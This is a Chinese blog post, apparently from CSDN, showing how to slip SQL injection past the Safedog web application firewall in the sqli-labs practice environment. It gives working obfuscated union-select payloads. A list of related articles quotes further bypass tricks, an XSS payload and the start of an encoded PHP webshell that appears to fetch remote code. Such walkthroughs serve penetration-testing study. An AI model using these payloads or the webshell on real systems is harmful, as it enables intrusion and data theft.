过waf的小思路-安全狗

最新推荐文章于 2024-05-01 13:10:11 发布
最新推荐文章于 2024-05-01 13:10:11 发布
阅读量460 收藏 3
点赞数 1
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42478365/article/details/124598075
版权

1.在安装好的sqli-labs-master的第一关中输入?id=1,可以看到显示出用户名与密码
在这里插入图片描述
2.输入?id=1’ 可以看出存在sql注入漏洞
在这里插入图片描述
3.当输入?id=1’ and 1=1时,可以看出当前页面被安全狗拦截
在这里插入图片描述
4.开启Burp抓包,对空格进行暴力破解可以看到当空格为/*/~*/ 时,绕过安全狗。
在这里插入图片描述
5.输入order by发现在当前列有三列
在这里插入图片描述

在这里插入图片描述
6.使用联合语句进行sql注入,union/*/~*/select/*/~*/1,2,3--+,发现被安全狗拦截。
在这里插入图片描述
7.使用BurpSuite对进行标注/*/~*/
在这里插入图片描述
8.设置有效载荷类型为爆破,字符集为特殊字符;其余两个同样。
在这里插入图片描述
9.点击长度发现&=/与其它长度不同。
在这里插入图片描述
10测试发现成功绕过waf,注意:需要将&=/进行url编码。
![!](https://img-blog.csdnimg.cn/7e5e044752ff418ab6381913c81872b0.png)
11.输入?id=-1'/*%26%3d%2f*/union/*%26%3d%2f*/select/*%26%3d%2f*/1,2,user/*%26%3d%2f*/()--+,发现页面显示出数据库的名字。
在这里插入图片描述
安全狗对information_schema拦截比较厉害,目前还没有找到绕过得办法,以后补上

冯·诺依曼
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WAF详解及WAF绕过
赤赤三的博客
03-20 8726
wafweb application firewall): 原理: web应用防火墙,一款集网站内容安全防护、网站资源安全防护及流量保护功能为一体的服务器工具。为用户提供实时网站安全防护,避免各类针对网站的攻击带来的危害。(核心其实也是基于规则的防御)| 任何工具(Awvs、IPS、IDS)其实都是基于规则进行匹配,最多加个爬虫功能 功能: 网马|木马主动防御及查杀 网页木马和网页挂马扫描工具采用特征码+启发式引擎的查杀算法,WEB木马检出率大于90% 网站漏洞防御
terraform-aws-waf-owasp-top-10-rules:一个Terraform模块,用于为OWASP创建AWF WAF规则十大安全风险防护
02-04
terraform-aws-waf-owasp-top-10-rules:一个Terraform模块,用于为OWASP创建AWF WAF规则十大安全风险防护
堆叠注入,waf绕过 安全狗为主(18)
san3144393495的博客
05-06 317
讲这个例子,堆叠注入他的一个用处,注入的时候需要获取到管理员的账户密码,但密码是加密的,加密经常揭秘不出来,很正常,可以利用这个注入实现堆叠注入,就是插入数据,诸如的时候向管理员这个表里面插入一个数据,成功的给管理员添加一个新用户,之后在用插入的用户名密码去登陆,就不需要考虑密码解不出来。基本上一些常见漏洞都检测,他的检测是插件的那种方法,每次更新也都是更新的插件,他会对还会对工具检测的一些常见的工具,nmap,菜刀,sqlmap,和xxs漏洞检测等基本上的都会检测,默认的检测项目是url。
2024年网安最全WAF相关知识及安全狗的部署和绕过_安全狗waf拦截规则
最新发布
2401_84265571的博客
05-01 1076
且云WAF的维护成本低,不需要部署任何硬件设备,云WAF的拦截规则会实时更新。对于部署了云WAF的网站,我们发出的数据请求首先会经过云WAF节点进行规则检测,如果请求匹配到WAF拦截规则,则会被WAF进行拦截处理,对于正常、安全的请求则转发到真实Web服务器中进行响应处理。若在安装过程中,出现如下两个页面:页面1中提示“服务器上没有Apache服务”,页面2中服务名为空(一般情况下,Apache服务开启,安全狗程序会自动读取服务名),则表示Apache的系统服务未开启,需要先开启Apache的系统服务。
深入waf绕过 (云盾,宝塔,安全狗)(19)
san3144393495的博客
05-07 3630
这个意思是他接受php后面的参数id,这个静态资源什么意思,这个waf很有可能过滤的是基于脚本类型的参数,也就是针对这种脚本类型的文件在进行过滤,针对某一些其他格式就不会过滤,比如图片格式文本格式,因为图片和文本格式一般不会带参数,造成不了危害,只有脚本里面有代码,或者是图片的代码没有危害,waf设计的时候就针对脚本格式和后缀里面的参数进行拦截,从网络层获取的 ip,这种一般伪造不来,如果是获取客户端的 IP,这样就可能存在伪造 IP 绕过的情。从请求来的数据包里面添加上面这五类。第二种方式 静态资源。
网络安全狗安装(safedog)waf 详细讲解
2301_81455724的博客
04-18 582
安装链接:https://www.123pan.com/s/ieUCjv-6H03A.html 提取码:Y3gQ。我们可以新建一个文件夹或选择一个文件夹,然后点击【确定】。接下来回到【点击安装】步骤。这也叫看门狗,小黑要利用 xss 等漏洞黑小红的网站。接下来是上面👆页面,注意⚠️⚠️⚠️了,要点击【浏览】当然不点击也可以。我们一般都是取消【开机时自动运行】,点击✔,然后点击【立即安装】。我们的电脑弹出来了上面页面,说明我们已经成功了(。•̀ᴗ-)✌️。下面我们如果点击了上面步骤【浏览】
WAF剖析】——SQL注入之安全狗bypass深度剖析
Demo不是emo的博客
11-23 6825
sql注入不会绕过WAF?关注我,让我带你由简入难实战各个WAF,今天先来看看web安全渗透必会的安全狗WAF,你会绕吗?看我带你将它拿下
第47天:WAF绕过-漏洞发现之代理池指纹被动探针1
08-03
1.扫描速度-(代理池,延迟,白名单等) 2.工具指纹-(特征修改,伪造模拟真实用户等) 3.漏洞 Payload-(数据变异,数据加密,白名单等)
WAF-A-MoLE:基于ML的Web应用程序防火墙的基于变异的引导模糊器
05-08
WAF-A-MoLE 受AFL启发并基于Andreas Zeller等人的 ,针对基于ML的Web应用程序防火墙的基于突变的引导。 给定一个输入SQL注入查询,它会尝试生成一个语义不变的查询,该查询能够绕过目标WAF。 您可以使用此工具通过...
Bypass-WAF-SQLMAP-master.zip
04-05
利用SQLMAP 绕过 WAF
waf源代码---基于Python脚本
04-05
在“压缩包子文件的文件名称列表”中提到了“waf-master”,这很可能是WAF项目的主分支或主要版本。通常,“master”分支是Git版本控制系统中的默认分支,包含了项目的最新稳定代码。因此,下载的“waf-master”可能...
php大马过waf
04-28
php大马过waf,,......................................................................................................
xss过waf(以安全狗为例)
qq_42383069的博客
03-11 1264
xss过waf(以安全狗为例) 0x01. Bypass原理: **原理:**我们知道安全狗会检测一些常见的XSS测试关键词,比如script、alert等。我们可以找到一些效果跟script、alert一样的,且未被安全狗拦截的语句去执行JS语句 测试script标签被拦截: 0x02. Bypass安全狗: 1)测试标签,弹窗测试,成功弹窗 <img src=x onerror=alert(/img/)> 2)测试prompt(用于显示可提示用户进行输入的对话框,可在alert被
应用安全-安全设备-Waf系列-软Waf-安全狗(Safedog)
weixin_30855099的博客
08-15 620
安装 - Linux 下载 http://download.safedog.cn/safedog_linux64.tar.gz wget http://download.safedog.cn/safedog_linux64.tar.gz 解压 tar xvf safedog_linux64.tar 运行 ./install.py 卸载 进入安装包解压目录...
BypassWAF安全狗以及手工注入大全
Grey的博客
03-24 2099
过狗姿势①HPP参数污染使用多个无用的值或者重复的值打到攻击效果②双文件上传1.txt1.php覆盖前个文件SQL手工注入大全都知道'报错是手工注入的一种方法,但是为什么要手工注入呢?因为让第一条数据报错,就可以执行第二条语句联合注入法查询表名查询列名正则匹配查询布尔值注入主要是and的问题‘1’=‘1’的话,会返回一个正常的页面如果user()=本地用户的时候,结果如下如下显示失败count用法...
绕过安全狗等一些WAF收集
weixin_30491641的博客
01-23 327
绕过安全狗sql注入 http://demo.74cms.com/plus/ajax_common.php?act=hotwordquery=錦union+select+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23 被拦截了,经过测试拦截的是select,那么把select换成/*!50000...
2018最新过全WAF/CDN/D盾/安全狗小马Or大马
IT界迷者Blog--
10-17 3363
2018最新过全WAF/CDN/D盾/安全狗小马Or大马 首先感谢土司大佬:Math_random 上代码—注意菜刀链接密码为:ximcx &lt;?php $x="BaSe64"; $b="_deCOde"; $c=$x.$b; eval($cc = $c('JGhhbmRsZSA9IGZvcGVuKCdodHRwOi8veGltY3guY24vMi50eHQnLCAncicpOw0KICA...
绕过WAF安全狗知识整理
aiquan9342的博客
10-26 242
0x01 前言 目前市场上的WAF主要有以下几类 1. 以安全狗为代表的基于软件WAF 2. 百度加速乐、安全宝等部署在云端的WAF 3. 硬件WAF WAF的检测主要有三个阶段,我画了一张图进行说明 本文主要总结的就是针对上面的三个阶段的绕过策略。小菜一枚,欢迎拍砖。 0x02 WAF身份认证阶段的绕过 WAF是有一个白名单的,在白名单内的客户请求将不做检测 ...
WAF简介
永远是少年
08-12 6183
今天继续给大家介绍渗透测试相关知识,本文主要内容是WAF简介。 一、WAF定义 二、WAF分类 三、WAF常见功能 四、WAF防护特点
绕过WAF运行命令执行漏洞的方法大全1
08-03
总结来说,这篇文章提供了一套Windows平台下利用命令执行漏洞绕过WAF的技巧,包括但不限于利用特殊字符组合、环境变量和变量操作来规避关键词检测,这对于网络安全专业人士理解和防御此类漏洞具有实际价值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值